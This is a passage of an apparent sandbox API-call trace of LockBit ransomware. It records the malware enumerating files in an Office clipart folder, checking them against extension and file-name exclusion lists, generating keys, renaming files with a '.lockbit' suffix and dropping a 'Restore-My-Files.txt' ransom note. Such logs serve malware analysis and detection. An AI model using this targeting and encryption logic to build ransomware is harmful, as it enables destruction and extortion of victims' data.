(lpString1=".dbv", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.450] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.451] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.451] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.451] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.451] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.451] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.lockbit") returned 72 [0108.451] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00252_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.452] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.452] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.452] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4708) returned 1 [0108.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.452] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.452] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.452] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.453] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.453] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.453] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.460] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.460] malloc (_Size=0xa6) returned 0x77d800 [0108.460] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.460] free (_Block=0x77d800) [0108.461] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00252_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.461] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.461] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.461] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7c9e7400, ftCreationTime.dwHighDateTime=0x1bd4ae4, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7c9e7400, ftLastWriteTime.dwHighDateTime=0x1bd4ae4, nFileSizeHigh=0x0, nFileSizeLow=0x6c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00254_.WMF", cAlternateFileName="")) returned 1 [0108.461] lstrcmpiW (lpString1=".", lpString2="BL00254_.WMF") returned -1 [0108.461] lstrcmpiW (lpString1="..", lpString2="BL00254_.WMF") returned -1 [0108.461] PathFindExtensionW (pszPath="BL00254_.WMF") returned=".WMF" [0108.461] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.461] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.462] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.462] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00254_.WMF") returned 1 [0108.463] lstrcmpiW (lpString1="ntldr", lpString2="BL00254_.WMF") returned 1 [0108.463] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00254_.WMF") returned 1 [0108.463] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00254_.WMF") returned 1 [0108.463] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00254_.WMF") returned -1 [0108.463] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00254_.WMF") returned 1 [0108.463] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00254_.WMF") returned 1 [0108.463] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.463] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF") returned=".WMF" [0108.463] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.463] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.463] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.464] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.464] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.lockbit") returned 72 [0108.464] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00254_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.477] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.477] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.477] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1736) returned 1 [0108.477] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.478] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.478] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.478] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.479] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.479] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.479] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0108.485] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.485] malloc (_Size=0xa6) returned 0x77d800 [0108.485] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0108.485] free (_Block=0x77d800) [0108.485] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00254_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.485] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.485] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.485] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6ae0bf00, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x519ef6b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6ae0bf00, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x30c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00261_.WMF", cAlternateFileName="")) returned 1 [0108.485] lstrcmpiW (lpString1=".", lpString2="BL00261_.WMF") returned -1 [0108.485] lstrcmpiW (lpString1="..", lpString2="BL00261_.WMF") returned -1 [0108.485] PathFindExtensionW (pszPath="BL00261_.WMF") returned=".WMF" [0108.485] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.485] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.485] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.485] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0108.486] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0108.486] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BL00261_.WMF") returned 1 [0108.487] lstrcmpiW (lpString1="ntldr", lpString2="BL00261_.WMF") returned 1 [0108.487] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BL00261_.WMF") returned 1 [0108.487] lstrcmpiW (lpString1="bootsect.bak", lpString2="BL00261_.WMF") returned 1 [0108.487] lstrcmpiW (lpString1="autorun.inf", lpString2="BL00261_.WMF") returned -1 [0108.487] lstrcmpiW (lpString1="thumbs.db", lpString2="BL00261_.WMF") returned 1 [0108.487] lstrcmpiW (lpString1="iconcache.db", lpString2="BL00261_.WMF") returned 1 [0108.487] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0108.487] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF") returned=".WMF" [0108.487] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0108.487] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0108.487] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0108.488] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0108.488] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.lockbit") returned 72 [0108.488] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00261_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0108.489] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0108.489] malloc (_Size=0x40068) returned 0x1ff1e60 [0108.489] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=12482) returned 1 [0108.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0108.490] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0108.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0108.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0108.490] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0108.494] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0108.495] malloc (_Size=0xa6) returned 0x77d800 [0108.495] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0108.497] free (_Block=0x77d800) [0108.497] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00261_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0108.497] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0108.497] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0108.497] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63b9b100, ftCreationTime.dwHighDateTime=0x1bd4b2c, ftLastAccessTime.dwLowDateTime=0x5f7031f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x63b9b100, ftLastWriteTime.dwHighDateTime=0x1bd4b2c, nFileSizeHigh=0x0, nFileSizeLow=0x9fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="BL00262_.WMF", cAlternateFileName="")) returned 1 [0108.497] lstrcmpiW (lpString1=".", lpString2="BL00262_.WMF") returned -1 [0108.497] lstrcmpiW (lpString1="..", lpString2="BL00262_.WMF") returned -1 [0108.497] PathFindExtensionW (pszPath="BL00262_.WMF") returned=".WMF" [0108.497] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0108.497] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0108.498] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0108.498] 